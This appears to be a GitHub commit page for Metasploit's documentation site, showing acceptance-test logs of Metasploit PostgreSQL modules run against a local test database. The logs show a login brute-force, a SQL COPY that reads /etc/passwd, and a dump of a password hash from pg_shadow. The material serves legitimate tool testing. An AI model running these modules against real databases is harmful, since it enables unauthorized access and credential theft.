Skip to content

Commit

Permalink
Reboot gh-pages
Browse files Browse the repository at this point in the history
  • Loading branch information
@msjenkins-r7
msjenkins-r7 committed Mar 28, 2024
0 parents commit 0f9ffdb
Show file tree
Hide file tree
Showing 3,148 changed files with 2,067,728 additions and 0 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
1 change: 1 addition & 0 deletions 404.html

Large diffs are not rendered by default.

1 change: 1 addition & 0 deletions CNAME
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
docs.metasploit.com
40 changes: 40 additions & 0 deletions acceptance-tests/app.js

Large diffs are not rendered by default.

22 changes: 22 additions & 0 deletions acceptance-tests/data/attachments/1320d86e05e31bcc.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
use auxiliary/admin/postgres/postgres_sql
Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_sql) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > [*] Running module against 127.0.0.1
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 Rows Returned: 1
Query Text: 'select version()'
==============================

version
-------
PostgreSQL 16.2 (Debian 16.2-1.pgdg120+2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit

[+] 127.0.0.1:5432 Postgres - Command complete.
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_sql) > jobs -K
[*] Killing all sessions...
msf6 auxiliary(admin/postgres/postgres_sql) >
16 changes: 16 additions & 0 deletions acceptance-tests/data/attachments/164ffab0b49154af.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
## Load test modules
loadpath test/modules

## Session module
use auxiliary/scanner/postgres/postgres_login

## Set global datastore
irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'

## Run command
run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432


## Replication commands
use auxiliary/admin/postgres/postgres_sql
run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
43 changes: 43 additions & 0 deletions acceptance-tests/data/attachments/16932f90e90b059d.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
msf6 > loadpath test/modules
Loaded 40 modules:
14 auxiliary modules
13 exploit modules
13 post modules
msf6 > features set postgresql_session_type true
postgresql_session_type => true
[!] Run the save command and restart the console for this feature to take effect.
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 1 opened (127.0.0.1:45871 -> 127.0.0.1:5432) at 2024-03-28 12:32:18 +0000
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_sql
run session=1 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > [*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 Rows Returned: 1
Query Text: 'select version()'
==============================

version
-------
PostgreSQL 16.2 (Debian 16.2-1.pgdg120+2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit

[+] 127.0.0.1:5432 Postgres - Command complete.
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_sql) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 1 closed.
msf6 auxiliary(admin/postgres/postgres_sql) >
16 changes: 16 additions & 0 deletions acceptance-tests/data/attachments/1d45e59d84435db3.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
## Load test modules
loadpath test/modules

## Session module
use auxiliary/scanner/postgres/postgres_login

## Set global datastore
irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'

## Run command
run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432


## Replication commands
use auxiliary/admin/postgres/postgres_sql
run session=1 Verbose=true
21 changes: 21 additions & 0 deletions acceptance-tests/data/attachments/1e1aef7fe8ecb52f.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
{
"required_lines": [
{
"values": [
"Query Text: 'select version()'"
],
"options": {
}
},
{
"values": [
"(?-mix:PostgreSQL \\d+.\\d+)"
],
"options": {
}
}
],
"known_failures": [

]
}
33 changes: 33 additions & 0 deletions acceptance-tests/data/attachments/220421846d7be7a.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
use auxiliary/scanner/postgres/postgres_login
Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_sql) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
msf6 auxiliary(scanner/postgres/postgres_login) > [!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 1 opened (127.0.0.1:35089 -> 127.0.0.1:5432) at 2024-03-28 12:32:19 +0000
use auxiliary/admin/postgres/postgres_sql
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > run session=1 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > [*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 Rows Returned: 1
Query Text: 'select version()'
==============================

version
-------
PostgreSQL 9.4.26 on x86_64-pc-linux-gnu (Debian 9.4.26-1.pgdg90+1), compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

[+] 127.0.0.1:5432 Postgres - Command complete.
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_sql) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 1 closed.
msf6 auxiliary(admin/postgres/postgres_sql) >
65 changes: 65 additions & 0 deletions acceptance-tests/data/attachments/24c293ecb8d1bcd2.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,65 @@
use auxiliary/admin/postgres/postgres_readfile
Stopping all jobs...
msf6 auxiliary(scanner/postgres/postgres_version) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_readfile) > [*] Running module against 127.0.0.1
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - querying with 'select has_database_privilege(current_user,current_database(),'TEMP')'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE uLuqkGEcj (INPUT TEXT);
COPY uLuqkGEcj FROM '/etc/passwd';
SELECT * FROM uLuqkGEcj'
[*] 127.0.0.1:5432 Rows Returned: 19
Query Text: 'CREATE TEMP TABLE uLuqkGEcj (INPUT TEXT);
COPY uLuqkGEcj FROM '/etc/passwd';
SELECT * FROM uLuqkGEcj'
==============================================================================================================================

input
-----
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
postgres:x:999:999::/var/lib/postgresql:/bin/bash
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
sys:x:3:3:sys:/dev:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
postgres:x:999:999::/var/lib/postgresql:/bin/bash
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240328123219_default_127.0.0.1_postgres.file_922762.txt
[+] 127.0.0.1:5432 Postgres - Command complete.
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_readfile) > jobs -K
[*] Killing all sessions...
msf6 auxiliary(admin/postgres/postgres_readfile) >
34 changes: 34 additions & 0 deletions acceptance-tests/data/attachments/2d65bd6d1d42f572.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
use auxiliary/scanner/postgres/postgres_login
Stopping all jobs...
msf6 post(test/postgres) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
msf6 auxiliary(scanner/postgres/postgres_login) > [!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 5 opened (127.0.0.1:44111 -> 127.0.0.1:5432) at 2024-03-28 12:32:21 +0000
use auxiliary/scanner/postgres/postgres_hashdump
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > run session=5 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_hashdump) > [*] 127.0.0.1:5432 Postgres - querying with 'SELECT usename, passwd FROM pg_shadow'
[!] No active DB -- Credential data will not be saved!
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

Username Hash
-------- ----
postgres SCRAM-SHA-256$4096:sjk2utYRzkZD/fTrjq535w==$fkTX6lZVin+pp7pYwoOiJMuu5C0oZirz6W+P6eBIVBI=:l//qaFM82oeFhCbH6UMxYeytYY2Tub6Kxf31zrHUzrY=

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(scanner/postgres/postgres_hashdump) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 5 closed.
msf6 auxiliary(scanner/postgres/postgres_hashdump) >
28 changes: 28 additions & 0 deletions acceptance-tests/data/attachments/3453c4bfbfdd2e29.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
{
"required_lines": [
{
"values": [
" Username Hash"
],
"options": {
}
},
{
"values": [
" -------- ----"
],
"options": {
}
},
{
"values": [
"(?-mix: postgres \\w+)"
],
"options": {
}
}
],
"known_failures": [

]
}
21 changes: 21 additions & 0 deletions acceptance-tests/data/attachments/360cc15d92fe2811.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
{
"required_lines": [
{
"values": [
"(?-mix:root:x:\\d+:\\d+:root:)"
],
"options": {
}
},
{
"values": [
"(?-mix:postgres:x:\\d+:\\d+::)"
],
"options": {
}
}
],
"known_failures": [

]
}
28 changes: 28 additions & 0 deletions acceptance-tests/data/attachments/372f18249e71706.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
{
"required_lines": [
{
"values": [
" Username Hash"
],
"options": {
}
},
{
"values": [
" -------- ----"
],
"options": {
}
},
{
"values": [
"(?-mix: postgres \\w+)"
],
"options": {
}
}
],
"known_failures": [

]
}
16 changes: 16 additions & 0 deletions acceptance-tests/data/attachments/37e4dca686410849.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
use auxiliary/scanner/postgres/postgres_version
Stopping all jobs...
msf6 auxiliary(scanner/postgres/postgres_version) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > [*] 127.0.0.1:5432 Postgres - Trying username:'postgres' with password:'password' against 127.0.0.1:5432 on database 'postgres'
[*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.4.26 on x86_64-pc-linux-gnu (Debian 9.4.26-1.pgdg90+1), compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit (Post-Auth)
[!] No active DB -- Credential data will not be saved!
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(scanner/postgres/postgres_version) > jobs -K
[*] Killing all sessions...
msf6 auxiliary(scanner/postgres/postgres_version) >
16 changes: 16 additions & 0 deletions acceptance-tests/data/attachments/3c24ef01d859bd91.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
use auxiliary/scanner/postgres/postgres_version
Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_sql) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > [*] 127.0.0.1:5432 Postgres - Trying username:'postgres' with password:'password' against 127.0.0.1:5432 on database 'postgres'
[*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 16.2 (Debian 16.2-1.pgdg120+2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit (Post-Auth)
[!] No active DB -- Credential data will not be saved!
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(scanner/postgres/postgres_version) > jobs -K
[*] Killing all sessions...
msf6 auxiliary(scanner/postgres/postgres_version) > Stopping all jobs...
Loading

0 comments on commit 0f9ffdb

Please sign in to comment.